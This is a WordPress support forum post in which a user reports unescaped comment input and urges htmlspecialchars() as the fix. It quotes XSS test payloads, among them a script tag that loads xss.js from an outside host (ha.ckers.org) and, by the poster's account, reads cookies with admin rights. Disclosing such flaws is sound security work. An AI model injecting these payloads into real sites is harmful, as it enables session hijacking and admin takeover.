Support » Requests and Feedback » Huge Security Risk – how come nobody fixed that yet?

  • Resolved euromark

    (@euromark)


    http://ha.ckers.org/xss.html has some test strings (they are harmless). But others might not be!

    So how come nobody solves this security risk yet?
    its as easy as htmlspecialchars() every comment / user input.

    See these examples:
    they are triggered in the backend as well as in the frontend (and can inject very dangerous code).

    ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
    <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

    the result is:
    a) reading out all cookie data: “This is remote text via xss.js located at ha.ckers.org wp-settings-1=…”
    b) breaking the layout (white screen of death)
    c) and other
    and this is not even close to what xss is capable of. just an example.
    usually the admin is not aware of it and the “dangerous code” has full admin rights as well. all get/ajax related requests could be triggered automatically with full admin rights.

Viewing 4 replies - 1 through 4 (of 4 total)
Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Huge Security Risk – how come nobody fixed that yet?’ is closed to new replies.